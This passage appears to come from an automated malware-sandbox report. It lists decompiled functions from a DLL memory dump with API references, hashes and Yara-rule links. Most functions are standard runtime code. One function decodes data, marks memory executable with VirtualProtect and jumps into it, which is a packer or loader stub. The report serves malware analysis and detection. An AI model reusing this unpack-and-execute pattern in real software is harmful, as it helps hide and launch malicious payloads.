Instruction Fuzzy Hash: A4115C7591052DCBCF01DBD4C844AFDB37AAF64B14F140909D511E7290CF78D985EB92

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C46AB, Relevance: 9.1, APIs: 6, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6E1C46AB(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t32;
				intOrPtr* _t33;
				void* _t45;
				intOrPtr* _t76;
				intOrPtr* _t83;
				intOrPtr* _t84;
				intOrPtr* _t87;
				void* _t88;

				_t62 = __ebx;
				E6E1E00AC(0x6e228144, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t88 - 0x14, 0);
				 *(_t88 - 4) =  *(_t88 - 4) & 0x00000000;
				_t83 =  *0x6e29ce84; // 0x35a6180
				 *((intOrPtr*)(_t88 - 0x10)) = _t83;
				_t32 = E6E1A161C(0x6e29cea8);
				_t65 =  *((intOrPtr*)(_t88 + 8));
				_t33 = E6E1A171B( *((intOrPtr*)(_t88 + 8)), _t32);
				_t86 = _t33;
				if(_t33 != 0) {
					L5:
					E6E1C66BA(_t88 - 0x14);
					return E6E1E0075(_t86);
				} else {
					if(_t83 == 0) {
						_push( *((intOrPtr*)(_t88 + 8)));
						_push(_t88 - 0x10);
						__eflags = E6E1C4FCE(__ebx, _t65, __edx, _t83, _t86) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t88 - 0x20);
							E6E1E3D74(_t88 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e22816f, __ebx, _t83, _t86, 0x18);
							E6E1C6653(_t88 - 0x14, 0);
							 *(_t88 - 4) =  *(_t88 - 4) & 0x00000000;
							_t84 =  *0x6e29ce7c; // 0x35a95b8
							 *((intOrPtr*)(_t88 - 0x10)) = _t84;
							_t45 = E6E1A161C(0x6e29ce90);
							_t72 =  *((intOrPtr*)(_t88 + 8));
							_t87 = E6E1A171B( *((intOrPtr*)(_t88 + 8)), _t45);
							__eflags = _t87;
							if(_t87 != 0) {
								L12:
								E6E1C66BA(_t88 - 0x14);
								return E6E1E0075(_t87);
							} else {
								__eflags = _t84;
								if(_t84 == 0) {
									_push( *((intOrPtr*)(_t88 + 8)));
									_push(_t88 - 0x10);
									__eflags = E6E1C4F5F(_t62, _t72, __edx, _t84, _t87) - 0xffffffff;
									if(__eflags == 0) {
										_t76 = _t88 - 0x20;
										E6E1A1438(_t76);
										E6E1E3D74(_t88 - 0x20, 0x6e283504);
										asm("int3");
										 *_t76 = __edx;
										return _t76;
									} else {
										_t87 =  *((intOrPtr*)(_t88 - 0x10));
										 *((intOrPtr*)(_t88 - 0x10)) = _t87;
										 *(_t88 - 4) = 1;
										E6E1C6FD3(__eflags, _t87);
										 *((intOrPtr*)( *_t87 + 4))();
										 *0x6e29ce7c = _t87;
										goto L12;
									}
								} else {
									_t87 = _t84;
									goto L12;
								}
							}
						} else {
							_t86 =  *((intOrPtr*)(_t88 - 0x10));
							 *((intOrPtr*)(_t88 - 0x10)) = _t86;
							 *(_t88 - 4) = 1;
							E6E1C6FD3(__eflags, _t86);
							 *((intOrPtr*)( *_t86 + 4))();
							 *0x6e29ce84 = _t86;
							goto L5;
						}
					} else {
						_t86 = _t83;
						goto L5;
					}
				}
			}

0x6e1c46ab
0x6e1c46b2
0x6e1c46bc
0x6e1c46c1
0x6e1c46ca
0x6e1c46d0
0x6e1c46d3
0x6e1c46d8
0x6e1c46dc
0x6e1c46e1
0x6e1c46e5
0x6e1c4720
0x6e1c4723
0x6e1c472f
0x6e1c46e7
0x6e1c46e9
0x6e1c46ef
0x6e1c46f5
0x6e1c46fd
0x6e1c4700
0x6e1c4733
0x6e1c4741
0x6e1c4746
0x6e1c474e
0x6e1c4758
0x6e1c475d
0x6e1c4766
0x6e1c476c
0x6e1c476f
0x6e1c4774
0x6e1c477d
0x6e1c477f
0x6e1c4781
0x6e1c47bc
0x6e1c47bf
0x6e1c47cb
0x6e1c4783
0x6e1c4783
0x6e1c4785
0x6e1c478b
0x6e1c4791
0x6e1c4799
0x6e1c479c
0x6e1c47cc
0x6e1c47cf
0x6e1c47dd
0x6e1c47e2
0x6e1c47e3
0x6e1c47e7
0x6e1c479e
0x6e1c479e
0x6e1c47a1
0x6e1c47a5
0x6e1c47a9
0x6e1c47b3
0x6e1c47b6
0x00000000
0x6e1c47b6
0x6e1c4787
0x6e1c4787
0x00000000
0x6e1c4787
0x6e1c4785
0x6e1c4702
0x6e1c4702
0x6e1c4705
0x6e1c4709
0x6e1c470d
0x6e1c4717
0x6e1c471a
0x00000000
0x6e1c471a
0x6e1c46eb
0x6e1c46eb
0x00000000
0x6e1c46eb
0x6e1c46e9

APIs

__EH_prolog3.LIBCMT ref: 6E1C46B2
std::_Lockit::_Lockit.LIBCPMT ref: 6E1C46BC
int.LIBCPMT ref: 6E1C46D3

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1C470D
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1C4723
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1C4741

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 3a48ebb510dfd7c8613794d7b0feef0b08f81e9f87b560980bef059fc7603b5c
Instruction ID: b1bbb36f3ce974606266bdfa6be00035076989d3f2f0ef3a311a289d9304dfd9
Opcode Fuzzy Hash: 3a48ebb510dfd7c8613794d7b0feef0b08f81e9f87b560980bef059fc7603b5c
Instruction Fuzzy Hash: 1C11487590462DCBCB01DBE4C814AFDB779BF24B14F100908E120EB290DB789985E7A2

Uniqueness

Uniqueness Score: -1.00%

Function 6E20D5FF, Relevance: 9.0, APIs: 6, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E6E20D5FF(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x6e2851e4; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E6E20C7EF(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E6E214196(_t25, __eflags,  *0x6e2851e4, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E6E20D33F(_t25, _t31, 0x6e2876f0);
							E6E20CBD3(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E6E20CBD3();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E6E2062FA(_t20, _t25, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x6e2851e4; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E6E20C7EF(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E6E214196(_t27, __eflags,  *0x6e2851e4, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E6E20D33F(_t27, _t32, 0x6e2876f0);
									E6E20CBD3(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E6E20CBD3();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E6E214140(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E6E214140(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

APIs

GetLastError.KERNEL32(?,6E29CE94,6E201803,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,90EFF98A), ref: 6E20D603
_free.LIBCMT ref: 6E20D636
_free.LIBCMT ref: 6E20D65E
SetLastError.KERNEL32(00000000,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,90EFF98A), ref: 6E20D66B
SetLastError.KERNEL32(00000000,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,90EFF98A), ref: 6E20D677
_abort.LIBCMT ref: 6E20D67D

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 71a35b8fa6742c727f7cc447368c8a597d01d724ff83cf0cfee6b9a66cc6a567
Instruction ID: 19f27a94440cbec6089753ab493450d8930eefda881e20ecf7b1a33f68bcafe4
Opcode Fuzzy Hash: 71a35b8fa6742c727f7cc447368c8a597d01d724ff83cf0cfee6b9a66cc6a567
Instruction Fuzzy Hash: A1F0F4BA545A0E2BC74216F4AD49F8B236F8BC367AB280915F52CD61D4EF6084028874

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C75E8, Relevance: 9.0, APIs: 6, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E6E1C75E8(intOrPtr _a4) {
				char _v16;
				intOrPtr _v24;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v68;
				char _v76;
				void* _t33;
				void* _t35;
				void* _t36;

				_t36 = _t35 - 0xc;
				E6E1C73A9( &_v16, _a4);
				E6E1E3D74( &_v16, 0x6e2814fc);
				asm("int3");
				_push(_t35);
				E6E1C73E3( &_v44, _v24);
				E6E1E3D74( &_v44, 0x6e281538);
				asm("int3");
				_push(_t36);
				_t33 = _t36 - 0xc;
				E6E1C7426( &_v76, _v52);
				E6E1E3D74( &_v76, 0x6e2815ac);
				asm("int3");
				_push(_t33);
				E6E1A1420( &_v68, _v48);
				E6E1E3D74( &_v68, 0x6e283450);
				asm("int3");
				return "bad function call";
			}

0x6e1c75eb
0x6e1c75f4
0x6e1c7602
0x6e1c7607
0x6e1c7608
0x6e1c7614
0x6e1c7622
0x6e1c7627
0x6e1c7628
0x6e1c7629
0x6e1c7634
0x6e1c7642
0x6e1c7647
0x6e1c7648
0x6e1c7654
0x6e1c7662
0x6e1c7667
0x6e1c766d

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 6E1C75F4

Part of subcall function 6E1C73A9: std::exception::exception.LIBCONCRT ref: 6E1C73B6

__CxxThrowException@8.LIBVCRUNTIME ref: 6E1C7602

Part of subcall function 6E1E3D74: RaiseException.KERNEL32(?,?,6E1C75E7,00000000,?,?,?,?,?,?,?,6E1C75E7,00000000,6E2814C0,?), ref: 6E1E3DD4

std::invalid_argument::invalid_argument.LIBCONCRT ref: 6E1C7614

Part of subcall function 6E1C73E3: std::exception::exception.LIBCONCRT ref: 6E1C73F0

__CxxThrowException@8.LIBVCRUNTIME ref: 6E1C7622
std::regex_error::regex_error.LIBCPMT ref: 6E1C7634

Part of subcall function 6E1C7426: std::exception::exception.LIBCONCRT ref: 6E1C743E

__CxxThrowException@8.LIBVCRUNTIME ref: 6E1C7642

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$std::invalid_argument::invalid_argument$ExceptionRaisestd::regex_error::regex_error
String ID:
API String ID: 2570946744-0
Opcode ID: 8259015cbef123a37b24c563d5b27f521c912703c1c9c1617d5fd2e4d5e105ea
Instruction ID: 53c6ac099acc4f3c244312de25c5feb8dce0d371fcf3ff68a1c06f66eeb258c1
Opcode Fuzzy Hash: 8259015cbef123a37b24c563d5b27f521c912703c1c9c1617d5fd2e4d5e105ea
Instruction Fuzzy Hash: ABF01235C0050C7BCB06FAF4DC49CDEBB7DAA14504F804D21BA20965D1EB75A79E97D2

Uniqueness

Uniqueness Score: -1.00%

Function 6E1BF218, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 188
memoryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E6E1BF218(signed int __edx) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				signed char _v24;
				signed int _t34;
				signed short _t36;
				void* _t44;
				intOrPtr _t45;
				signed int _t51;
				signed short _t59;
				signed char _t69;
				signed int _t72;
				signed char _t81;
				signed char _t84;
				signed short _t88;
				signed int _t96;
				void* _t98;
				signed int _t102;
				intOrPtr _t104;
				signed int _t105;
				signed int _t108;
				void* _t109;
				signed char _t110;
				signed int _t116;
				signed int _t122;
				signed int _t128;
				signed int _t129;
				signed char _t133;
				signed int _t134;
				signed char _t135;
				signed int _t137;
				void* _t138;
				signed short* _t139;
				signed short* _t142;
				signed short _t144;
				void* _t149;
				void* _t152;
				void* _t154;
				void* _t155;

				_t34 =  *0x6e2859e6 & 0x0000ffff;
				_v12 = __edx;
				asm("cdq");
				_t102 = __edx;
				_v20 = 0xf;
				_t128 =  *0x6e2859d8; // 0x8810b8d4
				_t142 = 0x6e2859e6;
				_t137 =  *0x6e285a00; // 0x776e8cd0
				_v24 = _t34;
				_v16 = __edx;
				do {
					if(_t128 != _t34) {
						L3:
						_t5 = _t128 + 5; // 0x8810b8d9
						_t137 = _t137 * ( *_t142 & 0x0000ffff);
						_t36 =  *0x6e2859f0; // 0xd0860090
						_t104 = _t5 + _t137;
						 *0x6e285a90 = _t104;
						if(_t104 != (_t36 & 0x0000ffff)) {
							_t34 = _v24;
							_t102 = _v16;
							goto L5;
						}
					} else {
						_t149 =  *0x6e2859dc - _t102; // 0x6
						if(_t149 == 0) {
							goto L5;
						} else {
							goto L3;
						}
					}
					break;
					L5:
					_t142 =  &(_t142[1]);
				} while (_t142 < 0x6e285a44);
				_t143 = _v12 * 0x10e1d;
				 *0x6e285a00 = _t137;
				_t138 =  *0x6e29c8d0; // 0x6e2886a0
				 *0x6e285a04 = _t128 -  *0x6e285a04 + 0x11;
				 *0x6e288698 = _t138;
				 *0x6e2859d8 = E6E1E01E0(_v12 * 0x10e1d, 0, _t128,  *0x6e2859dc);
				 *0x6e2859dc = _t128;
				VirtualProtect(_t138, 0x305a, 0x40, 0x6e28869c);
				_t129 =  *0x6e2859d0; // 0x90eff98a
				_t44 = 6;
				_v24 = _t129;
				_t152 =  *0x6e285a02 - _t44; // 0x776e
				if(_t152 == 0) {
					_t45 =  *0x6e285a90; // 0x896cd2f8
					 *0x6e285a00 = _t45 + 0x11dde + _t129;
				} else {
					 *0x6e285a90 =  *0x6e285a90 +  ~_t129 -  *0x6e285a00 * 0x3d;
				}
				_t105 =  *0x6e2859d8; // 0x8810b8d4
				_t130 =  *0x6e2859e6 & 0x0000ffff;
				_v5 = _t129 + _t105;
				if(( *0x6e2859f2 & 0x0000ffff) + ( *0x6e2859e6 & 0x0000ffff) != 0x32) {
					_t51 = E6E1E01E0(_t143, 0, _t105,  *0x6e2859dc);
					_v16 = _t51;
					_v20 = _t51 * 0x00000037 & 0x0000ffff;
				} else {
					_t96 =  *0x6e2859dc; // 0x6
					_t98 = E6E1E01E0(E6E1E01E0(_t105, _t96, _t105, _t96), _t130, 0xfffef1e3, 0xffffffff);
					_push(0);
					_v16 = _t98 + _v12 + 0xf;
				}
				_t139 = 0x6e2859e6;
				_t108 = _v16;
				_t133 = 0x70 * (_v24 & 0x000000ff) + 0x70;
				_v24 = _t133;
				 *0x6e285a04 = _t133;
				_t154 =  *0x6e285a04 - 0x1b47; // 0x90
				if(_t154 != 0) {
					_t59 = _v20;
				} else {
					asm("cdq");
					_t133 = _v24;
					_t122 = _t108 + ( *0x6e2859e6 & 0x0000ffff);
					_v16 = _t122;
					_t59 = _v20 + _t122 * 2 + 0x3b;
				}
				_t109 = 6;
				_t155 =  *0x6e285a02 - _t109; // 0x776e
				if(_t155 == 0) {
					 *0x6e285a00 = (_t59 & 0x0000ffff) + 0x11dde + (_t133 & 0x000000ff);
				}
				_t110 =  *0x6e2859d0; // 0x90eff98a
				 *0x6e2859dc =  *0x6e2859dc & 0x00000000;
				_t144 = _v16 + 0x00000005 + _t110 & 0x0000ffff;
				 *0x6e2859d8 = _t144 - _v12 - 0x54;
				 *0x6e2859d0 = _t110 + 0x23bbc + (_t133 & 0x000000ff) * 2;
				 *0x6e288698();
				_t69 =  *0x6e2859d0; // 0x90eff98a
				_t134 = _v12;
				 *0x6e2859d8 =  *0x6e2859d8 + _t69 + 0x3b + ( *0x6e285a04 & 0x000000ff);
				_t72 =  *0x6e2859e6 & 0x0000ffff;
				asm("adc dword [0x6e2859dc], 0x0");
				do {
					if(_t134 == _t72) {
						goto L22;
					} else {
						_t144 = ( *_t139 & 0x0000ffff) * (_t144 & 0x0000ffff) & 0x0000ffff;
						_t116 = _t134 + 5 + _t144;
						 *0x6e2859dc = 0;
						_t88 =  *0x6e2859f0; // 0xd0860090
						asm("cdq");
						 *0x6e2859d8 = _t116;
						if(_t116 != (_t88 & 0x0000ffff)) {
							L21:
							_t72 =  *0x6e2859e6 & 0x0000ffff;
							_t134 = _v12;
							goto L22;
						} else {
							_t72 = 0;
							if(0 != _t134) {
								goto L21;
							}
						}
					}
					break;
					L22:
					_t139 =  &(_t139[1]);
				} while (_t139 < 0x6e285a44);
				asm("invalid");
				_t135 =  *0x6e2859d0;
				_push(0);
				asm("adc [0x6e2859dc], eax");
				 *0x6e2859d8 = 0x49 + (_t144 - 0x1165 - _v12 & 0x0000ffff) + 0x3b + _t135;
				_t81 = ((_t135 & 0x000000ff) * ( *0x6e285a04 & 0x000000ff) & 0x000000ff) * 0x1d;
				 *0x6e285a04 = _t81;
				_t84 = (_t81 & 0x000000ff) * 0x36 + _t135;
				 *0x6e2859d0 = _t84;
				return _t84;
			}

0x6e1bf21e
0x6e1bf225
0x6e1bf228
0x6e1bf22a
0x6e1bf22c
0x6e1bf233
0x6e1bf239
0x6e1bf23f
0x6e1bf245
0x6e1bf248
0x6e1bf24b
0x6e1bf24d
0x6e1bf257
0x6e1bf25a
0x6e1bf25d
0x6e1bf260
0x6e1bf268
0x6e1bf26a
0x6e1bf272
0x6e1bf274
0x6e1bf277
0x00000000
0x6e1bf277
0x6e1bf24f
0x6e1bf24f
0x6e1bf255
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1bf255
0x00000000
0x6e1bf27a
0x6e1bf27a
0x6e1bf27d
0x6e1bf28b
0x6e1bf29c
0x6e1bf2a2
0x6e1bf2a8
0x6e1bf2b2
0x6e1bf2ca
0x6e1bf2cf
0x6e1bf2d5
0x6e1bf2db
0x6e1bf2e3
0x6e1bf2e4
0x6e1bf2e7
0x6e1bf2ee
0x6e1bf305
0x6e1bf311
0x6e1bf2f0
0x6e1bf2fd
0x6e1bf2fd
0x6e1bf316
0x6e1bf31f
0x6e1bf326
0x6e1bf335
0x6e1bf36b
0x6e1bf370
0x6e1bf379
0x6e1bf337
0x6e1bf337
0x6e1bf34e
0x6e1bf356
0x6e1bf35c
0x6e1bf35c
0x6e1bf385
0x6e1bf395
0x6e1bf3a0
0x6e1bf3a2
0x6e1bf3a5
0x6e1bf3ab
0x6e1bf3b2
0x6e1bf3cf
0x6e1bf3b4
0x6e1bf3bb
0x6e1bf3bc
0x6e1bf3bf
0x6e1bf3c4
0x6e1bf3ca
0x6e1bf3ca
0x6e1bf3d4
0x6e1bf3d5
0x6e1bf3dc
0x6e1bf3eb
0x6e1bf3eb
0x6e1bf3f3
0x6e1bf3fc
0x6e1bf405
0x6e1bf416
0x6e1bf421
0x6e1bf426
0x6e1bf42c
0x6e1bf43b
0x6e1bf440
0x6e1bf446
0x6e1bf44d
0x6e1bf454
0x6e1bf456
0x00000000
0x6e1bf458
0x6e1bf461
0x6e1bf469
0x6e1bf46d
0x6e1bf472
0x6e1bf47a
0x6e1bf47b
0x6e1bf483
0x6e1bf48b
0x6e1bf48b
0x6e1bf492
0x00000000
0x6e1bf485
0x6e1bf485
0x6e1bf489
0x00000000
0x00000000
0x6e1bf489
0x6e1bf483
0x00000000
0x6e1bf495
0x6e1bf495
0x6e1bf498
0x6e1bf4a2
0x6e1bf4aa
0x6e1bf4b3
0x6e1bf4c5
0x6e1bf4d2
0x6e1bf4e3
0x6e1bf4e6
0x6e1bf4f1
0x6e1bf4f3
0x6e1bf4f9

APIs

VirtualProtect.KERNEL32(6E2886A0,0000305A,00000040,6E28869C,?,00000000,8810B8D4,008BD086,?), ref: 6E1BF2D5

Strings

DZ(n, xrefs: 6E1BF498
Y(n, xrefs: 6E1BF239
DZ(n, xrefs: 6E1BF27D
Y(n, xrefs: 6E1BF385

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ProtectVirtual
String ID: DZ(n$DZ(n$Y(n$Y(n
API String ID: 544645111-2308019807
Opcode ID: 30eb74fd42d4a76d51b7eec8f607349721be85b96f651f826f30124ddf3ab81f
Instruction ID: 9061cb366b589b9961d2ce01ec9ee1fd8626e6b7150f46ddf7e5a6f9bb5777f3
Opcode Fuzzy Hash: 30eb74fd42d4a76d51b7eec8f607349721be85b96f651f826f30124ddf3ab81f
Instruction Fuzzy Hash: 6D71C2759415519FCF04CFA9C8C96BF7BF6BB4B310B20805BE452DB281E334A588DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C53EB, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6E1C53EB(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t35;
				short _t49;
				intOrPtr _t55;
				signed int _t58;
				intOrPtr _t66;
				void* _t70;
				void* _t78;

				_t61 = __edx;
				E6E1E014E(0x6e228264, __ebx, __edi, __esi, 0xa4);
				_t55 = __ecx;
				 *((intOrPtr*)(_t70 - 0x4c)) = __ecx;
				 *((intOrPtr*)(_t70 - 0x44)) = E6E201A3F(__ecx, __edx);
				_t35 = E6E1C91D8(__ecx, __edx, _t78, _t70 - 0x80);
				_t58 = 0xb;
				memcpy(_t70 - 0x40, _t35, _t58 << 2);
				_t66 =  *((intOrPtr*)(_t70 - 0x44));
				_t79 =  *((char*)(_t70 + 0xc));
				 *((intOrPtr*)(_t55 + 8)) = 0;
				 *((intOrPtr*)(_t55 + 0x10)) = 0;
				 *((intOrPtr*)(_t55 + 0x14)) = 0;
				 *((intOrPtr*)(_t70 - 4)) = 0;
				if( *((char*)(_t70 + 0xc)) == 0) {
					_t13 = _t66 + 8; // 0x0
					 *((intOrPtr*)(_t70 - 0x48)) =  *_t13;
				} else {
					 *((intOrPtr*)(_t70 - 0x48)) = 0x6e2394dd;
				}
				E6E1C91D8(_t55, _t61, _t79, _t70 - 0x80);
				_push(_t70 - 0xac);
				_push(0);
				 *((intOrPtr*)(_t55 + 8)) = E6E1C5B01(_t61, _t66, 0, _t70, _t79,  *((intOrPtr*)(_t70 - 0x48)));
				_push(_t70 - 0x40);
				 *((intOrPtr*)(_t55 + 0x10)) = E6E1A17AF(_t55, _t61, _t66, 0, _t70, _t79, "false", 0);
				_push(_t70 - 0x40);
				 *((intOrPtr*)(_t55 + 0x14)) = E6E1A17AF(_t55, _t61, _t66, 0, _t70, _t79, "true", 0);
				if( *((char*)(_t70 + 0xc)) == 0) {
					_t28 = _t66 + 0x30; // 0x0
					 *((short*)(_t55 + 0xc)) =  *((intOrPtr*)( *_t28));
					_t30 = _t66 + 0x34; // 0xc
					_t49 =  *((intOrPtr*)( *_t30));
				} else {
					 *((short*)(_t55 + 0xc)) = E6E1A177E(0x2e, 0, _t70 - 0x40);
					_t49 = E6E1A177E(0x2c, 0, _t70 - 0x40);
				}
				 *((short*)(_t55 + 0xe)) = _t49;
				return E6E1E009B(_t49, _t55, _t66, 0);
			}

0x6e1c53eb
0x6e1c53f5
0x6e1c53fa
0x6e1c53fc
0x6e1c5404
0x6e1c540b
0x6e1c5413
0x6e1c5419
0x6e1c541b
0x6e1c5420
0x6e1c5424
0x6e1c5427
0x6e1c542a
0x6e1c542d
0x6e1c5430
0x6e1c543b
0x6e1c543e
0x6e1c5432
0x6e1c5432
0x6e1c5432
0x6e1c5445
0x6e1c5451
0x6e1c5452
0x6e1c545e
0x6e1c5464
0x6e1c5473
0x6e1c5479
0x6e1c5488
0x6e1c548f
0x6e1c54bf
0x6e1c54c5
0x6e1c54c9
0x6e1c54cc
0x6e1c5491
0x6e1c54a0
0x6e1c54ab
0x6e1c54b0
0x6e1c54b3
0x6e1c54bc

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 6E1C53F5
__Getcvt.LIBCPMT ref: 6E1C540B
__Getcvt.LIBCPMT ref: 6E1C5445

Strings

true, xrefs: 6E1C547B
false, xrefs: 6E1C5466

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Getcvt$H_prolog3_catch_
String ID: false$true
API String ID: 1810345438-2658103896
Opcode ID: 129c42d73cfcf5854ee97412bfe206344c48cd21f45318dfbd16754a16eea946
Instruction ID: 4bf78b0fe211f568805d874adafc3feb958ab96c6a9681ce4094544948a97193
Opcode Fuzzy Hash: 129c42d73cfcf5854ee97412bfe206344c48cd21f45318dfbd16754a16eea946
Instruction Fuzzy Hash: F72194B6D01218EFDB01DFE4C880AEEBB78BF15714F144466E9049F600EB349995DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E20970F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6E2096A5,?,?,6E209645,?,6E282D28,0000000C,6E20978A), ref: 6E20972F
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E209742
FreeLibrary.KERNEL32(00000000,?,?,?,6E2096A5,?,?,6E209645,?,6E282D28,0000000C,6E20978A), ref: 6E209765

Strings

CorExitProcess, xrefs: 6E20973A
mscoree.dll, xrefs: 6E209728

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 796e6444d5f5245c307bbaed419fb8c85de091e52bfd47d3223efb4feca62440
